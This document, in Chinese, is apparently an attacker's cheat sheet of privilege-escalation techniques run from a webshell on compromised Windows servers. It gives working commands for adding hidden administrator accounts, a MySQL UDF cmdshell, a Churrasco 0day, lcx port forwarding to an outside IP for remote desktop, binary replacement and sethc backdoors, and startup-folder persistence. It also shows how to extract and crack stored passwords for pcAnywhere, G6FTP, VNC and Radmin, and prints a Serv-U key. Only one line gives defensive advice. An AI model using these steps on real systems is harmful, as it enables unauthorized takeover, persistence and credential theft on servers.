常用webshell提权方法总结

pcAnywhere提权：
1.利用pcAnywhere提权，前提条件是pcAnywhere默认安装到默认路径，以及它的目录安全权限有users权限,如果管理员删除了users和power users用户的目录权限，只剩下administer和system用户目录权限，则无法提权；
2.在webshll的大马中查找到pcanywhere目录里的host目录，里面的cif文件保存了连接pcanywhere的账户和密码，然后下载下来，通过PcAnywhere密码破解工具进行破解密码，然后再自己的电脑上安装pcanywhere，然后通过连接到另一台电脑进行远程桌面连接；
——————————–
利用HASH破解提权：
1.工具：ophcrack-win32-installer-3.3.0（hash破解软件） ，Pwdump7（查看hash的软件），彩虹表（密码字典）
2.思路：渗透，管理员可能几台服务器都实用同个密码，我们获取其他一个以后可以尝试登陆
其他服务器
3.例如添加一个用户并将该用户添加到管理员组：net user backlion 123456 /add
net localgroup administrators backlion /add
4.在dos下用pwdump7运行查看该用户的hash值：backlion:1003:2FB6717FC6897581AAD3B435B51404EE:DA0492D72F8D04983188CCD4CA257E44:::
5.然后通过ophcrack和彩虹表进行破解该用户
6.防范：密码超过14位就不能破解，建议密码设置15位，越复杂越好

————————————————
MYSQL提权(udf.dll)：
1.用的文件有su.php木马，Linx Mysql BackDoor.php木马
1.udf.dll的默认路径：C:\Winnt\udf.dll（win2000系统），C:\Windows\udf.dll （win2003系统）
2.找到网站目录mysql配置文件，常用的有：config.php,web.php,webconfig.php
配置文件如下：
$dbhost = ‘localhost’; // 数据库服务器 就是127.0.0.1
$dbuser = ‘root’; // 数据库用户名
$dbpw = ‘a’; // 数据库密码
$dbname = ‘dz’; // 数据库名
3.在su.php中，填入host:127.0.0.1 user:root passwor:a db:mysql,然后输入sql命令进行添加用户：select state(“net user backlion 123 /add & net localgroup administrators backlion /add”)
然后通过net user查看是否添加成功
4.在udf.ph 中host:127.0.0.1 user:root passwor:a db:mysql，然后填入DLL导出路径：C:\Windows\udf.dll ,在sql命令中输入一下命令：
create function cmdshell returns string soname ‘udf.dll’//添加一个udf.dll组件函数
select cmdshell(‘net user backlion$ 123456 /add’); //添加一个用户
select cmdshell(‘net localgroup administrators backlion$ /add’); //将用户添加到管理员组
select cmdshell(‘c:\3389.exe’); //这个是把开3389的文件放到C盘，然后运行
drop function cmdshell; //删除函数
select cmdshell(‘netstat -an’); //这是查看端口查开放情况
———————————————————————-
Churrasco提权：
1.用到的工具有：win2003 0day漏洞工具03.exe和cmd.exe；
2.然后在webshell中上传我们的03.exe和cmd.exe到可以读写的目录中，然后切换到可读写的目录中：然后在webshll路径中填入我们的cmd.exe路径如;c :/recyle/cmd.exe 下面填入：c :/recyle/03.exe “net user backlion 123 /add & net localgroup adminstrators backlion /add”
————————————————————————————–
利用sogou输入法（6.0）提权：
1.sogou输入法是6.0版本，然后我们通过webshll木马管理，查找到sogou安装的路径，然后通过上传
ImeUtil.exe 替换原来的ImeUtil.exe文件，只要一加载这个程序就会在系统中自动添加管理员
用户名：sunwear 密码：sunwear
————————————————————
lcx内网端口转化，解决在内网不能远程桌面登录：
1.webshll目标站点的wscript组件开启，并且有一个可读写的目录，一般上传到c:/recyle目录下
2.上传我们的cmd.exe和lcx.exe上去
3.然后在shll路径中填入：c:/recyle/cmd.exe 下面就输入c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1 3389
4.在本地DOS下输入： d:/lcx.exe listen 51 3333 监听51并转发到3333端口
4.在本地远程桌面里面输入:127.0.0.1:3333
———————————————
6Gftp提权：
1.默认安装目录C:\Program Files\Gene6 FTP Server
2.密码保存文件的路径是在C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini
其配置文件如下：
[Server]
IP=127.0.0.1,8021\r\n //使用的端口号
GrantAllAccessToLocalHost=0
[Acct=Administrator] //用户名
Enabled=1
Rights=0
Password=21232F297A57A5A743894A0E4A801FC3 //md5密码

3.在webshll中发现了有安装g6ftp软件，默认安装路径
4.在shll中输入：C:\recycler\lcx.exe -tran 8022 127.0.0.1 8021
6.在本地安装6gftp软件，IP地址输入：目标站点IP地址。端口号为8022，用户名为administrator,密码为破解出来的md5值；
——————————————–
Serv-U6.4提权：
1.serv-u的密钥：9dK4g4iPhvOsoEY9nprEiSsmW7OUqFaGuwHT1CtBn9K6hQVg0bd2okQ9ldel+1IGE9b4xDP0q2W+vE4vgZLA7unm6t3CxTI
2.在serv-u中下面的命令中输入：cmd /c net user backlion$ 123 /add & net localgroup administrators backlion$ /add
3.然后就添加了一个用户名
4.就可以用这个账号远程桌面登录了；
—————————————————-
VNC密码的破解和提权：
1在webshll中读取vnc注册表键值：RealVNC的注册表路径：
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password
UltraVNC的注册表路径：
HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password
读取的是十进制数，需要转换成十六进制如下：
十六进制：D7 51 CC 73 31 24 7A 93
十进制： 12 7C EF FA 6E 0B 7A D9
3.破解vnc密码：vncpwdump.exe D751CC7331247A93
4.然后在本地安装一个VNC客户端，进行远程连接
—————————————————————-
Radmin提权：
1.在webshll中检查出有安装Radmin程序；
2.在读取Radmin注册表键值，然后把读取的十进制转换成16进制；
3.直接用radmi-hash工具连接，把读取的十六进制填入进去；
4.最后可以用radmin客户端连接就行了；
————————————————–
360安全卫士提权：
1.上传我们的cmd.exe和360.exe到可读写的目录下如：c:/recyle
2.在shell中输入：c:/recyle/cmd.exe 然后在下面输入：c:/recyle/360.exe sethc
3.然后远程桌面登录输入目标IP地址，过一会就弹出了一个DOS窗口，然后就可以添加用户名和密码
———————————————————————————
启动项提取：
1.在webshll中上传一个添加用户的批处理文件如：net user backlion$ 123456 /add & net localgroup adminsitrators backlion$ /add
爆出为系统修复.bat;
2.然后在wegshll中输入启动选的路径：C:\Documents and Settings\Administrator\「开始」菜单\程序\启动 上传我们的批处理文件；
3.只要管理员下次重新启动机子，就能自动添加我们的账号；